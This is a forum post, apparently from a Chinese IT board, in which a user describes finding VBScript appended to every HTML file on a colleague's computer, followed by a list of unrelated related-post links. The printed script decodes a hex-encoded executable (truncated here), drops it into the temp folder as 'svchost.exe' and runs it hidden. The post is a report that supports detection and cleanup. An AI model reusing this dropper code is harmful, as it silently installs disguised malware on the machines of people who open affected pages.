同事发来的文件是个html,逮到一个疑是感染html,htm,网页文件的木马
事情是这样子的
远程帮同事搞进销存软件 ,发现软件打开不正常了
如图
"在此页上的ActiveX控件和本页上的其它部分的交互可能不安全“
我选择继续,是
如下图
“当前页面脚本发生错误。%1不是有效的win32应用程序。”
这里我要说一下的,IE浏览器我都是设置过的,正常情况下进入这个页面是不会有这两个提示的
我觉得哪里有猫腻,我按提示路径找到那个html文件,发现如下
在html文件尾部被添加了如下代码
[Visual Basic] 纯文本查看 复制代码
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000...........后面还有很多"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//-->
用文本记事本打开一串字符,打开会乱码
这个代码目的是什么吗?只感染一个软件 ?然后检查所有的html文件,
发现所有的html 网页文件全部被修改添加了 ,如图
全盘的文件无一幸免,我不懂编程,但知道这是VBS代码,应该有一段时间了的,本地安装了3X0全家桶的,但好像没有阻止
现在正在挂了一个Win 10 ,用Windows Defender 安全中心扫描中
微软自家产品还是可以的
论坛上也有类似的案例,前面我搜索了一下2015年时候就有类似案例的VBS木马(应该算木马)
我这边发帖子,分享整个问题发现的过程
,从软件打开异常,发现html网页有问题,第一次发帖子,来支持论坛
PS: 感觉国产杀毒软件(3X0,等不怎么靠谱)
同事发来的文件是个html,逮到一个疑是感染html,htm,网页文件的木马相关推荐
- python编写请求参数带文件_转载:如何编写一个带命令行参数的Python文件
看到别人执行一个支持命令行参数的python文件,瞬间觉得高大上起来.牛逼起来,那么如何编写一个带命令行参数的python脚本呢?不用紧张,下面将简单易懂地让你学会如何让自己的python脚本,支持命 ...
- 如何清理卸下应用的残余文件_Windows电脑清理、卸载一个应用程序,并清除残留文件...
为什么要经常清理我们的电脑? 我们非常确定计算机是必须保持干净整洁的运行环境的.否则,计算机可能会在你的忽视下受到很大的影响.的确,垃圾文件会使你的PC(个人电脑)变慢.无响应,甚至容易受到各种电脑病 ...
- java中获取文件总行数_关于java:如何以有效的方式获取文件中的行数?
本问题已经有最佳答案,请猛点这里访问. 我有一个大文件. 它包括大约3.000-20.000行. 如何使用Java获取文件中的行总数? 从你的评论到答案来判断,你要找的词是"有效的" ...
- 创建网页文件html,HTML快速入门之创建网页文件
本文为零基础学习者准备了关于创建网页文件的相关学习笔记,具体内容包括网页文件创建.HTML标签语法规范.HTML标签的关系以及HTML整体结构.完成以上内容的学习,大家基本上就能学会如何创建一个有简单 ...
- “打开ftp服务器上的文件夹时发生错误,请检查是否有权限访问该文件夹
阿里云虚拟主机上传网站程序 问题场景:网页制作完成后,程序需上传至虚拟主机 注意事项: 1.Windows系统的主机请将全部网页文件直接上传到FTP根目录,即 / . 2. 如果网页文件较多,上传较慢 ...
- 干货丨速度教你创建网页文件,实现HTML入门
今天,为大家准备了关于创建网页文件的学习内容,具体包括网页文件创建.HTML标签语法规范.HTML标签的关系以及HTML整体结构. 完成以上内容的学习,零基础学习者基本上就能学会如何创建一个有简单内容 ...
- word能保存html文件,Word可以保存为网页文件 教你来回转 Word转成网页,网页转Word...
Word可以保存为网页文件 教你来回转 Word转成网页,网页转Word,听说word的教程在抖音很火,很多白领小朋友都在争相学习,下面就跟小编一起学习一下 Word可以保存为网页文件的新技能吧,看完 ...
- “打开ftp服务器上的文件夹时发生错误,请检查是否有权限访问该文件夹“
阿里云虚拟主机上传网站程序 问题场景:网页制作完成后,程序需上传至虚拟主机 注意事项: 1.Windows系统的主机请将全部网页文件直接上传到FTP根目录,即 / . 2. 如果网页文件较多,上传较慢 ...
- lwip-2.1.3自带的httpd网页服务器使用教程(一)从SD卡读取网页文件并显示
概述 本教程使用的单片机是STM32F103ZE,有线网口芯片为ENC28J60. 本教程里面的网页由于需要兼容Windows XP系统的IE8浏览器,所以采用HTML 4.01编写,不使用任何前端框 ...
- Go 学习笔记(54)— Go 第三方库之 uber-go/zap/lumberjack(记录日志到文件、支持自动分割日志、支持日志级别、打印调用文件、函数和行号)
1. 简要说明 zap 是 uber 开源的 Go 高性能日志库,支持不同的日志级别, 能够打印基本信息等,但不支持日志的分割,这里我们可以使用 lumberjack 也是 zap 官方推荐用于日志分 ...
最新文章
- 国产scrum敏捷开发工具- leangoo领歌
- 登上Science子刊,神经科学再次启发DNN设计!中科院揭秘介观自组织反向传播机制...
- Spring注解编程基石(四)
- 《信号与系统》期中总结
- 谈判失败:Oracle杀死Java EE
- mysql 自动备份发送,Centos定时自动备份MySQL数据库并发送至指定邮箱
- 开关电源闭环控制原理_stepbystep,电路设计全过程(含原理图)
- 取代上万行遗留代码,机器学习模型终“上位”
- 在线合成车牌照片【模拟车牌,用于车牌识别项目测试】
- 微软官方office教程和微软官方office模板
- 详版大数据报告_《2018抖音大数据报告》完整版,赶快收藏!
- Coap协议(1)入门简介
- 面向大众征集 “故宫·金榜题名”文创众筹大赛启动
- 什么是游戏引擎,什么是虚幻引擎(Unreal Engin 4)?
- 异步电路中时钟同步的方法
- “2019年全国职业院校技能大赛”高职组计算机网络应用竞赛竞赛样题B卷(软件定义网络部分答案参考)
- pandas(四)pandas的拼接操作
- ipad一直卡在白苹果_iPad 为什么至今都没有天气和计算器应用?苹果回答来了
- 分页插件PageHelper失效
- oracle整库的移植,Oracle数据库整机移植技术(原创)